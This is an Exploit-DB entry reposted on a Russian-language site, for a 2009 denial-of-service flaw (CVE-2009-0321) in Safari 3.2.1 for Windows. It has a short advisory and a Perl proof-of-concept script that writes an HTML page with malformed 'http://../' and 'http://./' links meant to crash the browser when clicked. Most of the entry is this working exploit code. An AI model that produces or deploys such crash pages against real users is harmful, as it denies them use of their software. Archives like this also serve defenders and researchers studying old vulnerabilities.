- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32761
- Проверка EDB
-
- Пройдено
- Автор
- LOSTMON
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2009-0321
- Дата публикации
- 2009-01-27
Код:
source: https://www.securityfocus.com/bid/33481/info
Apple Safari is prone to a denial-of-service vulnerability because it fails to adequately sanitize user-supplied input.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
Apple Safari 3.2.1 for Windows is vulnerable; other versions may also be affected.
# !/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [[email protected] ]
#[http://lostmon.blogspot.com]
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Uso: $0 <archivo.html>\n";
}
$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title>
<body>" . "\n";
$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>([email protected]) http://lostmon.blogspot.com</h3>
<P>This PoC is a malformed http URI, this causes that safari for windows<br>
turn inestable and unresponsive.<br>
Click THIS link.=></p><a href=\"http://../\">Safari Die()</a> or this other =><a href=\"http://./\">Safari Die()</a>
";
$piepag = "</body></html>";
$datos = $cabecera . $codigo . $piepag;
open(FILE, '>' . $archivo);
print FILE $datos;
close(FILE);
exit;- Источник
- www.exploit-db.com
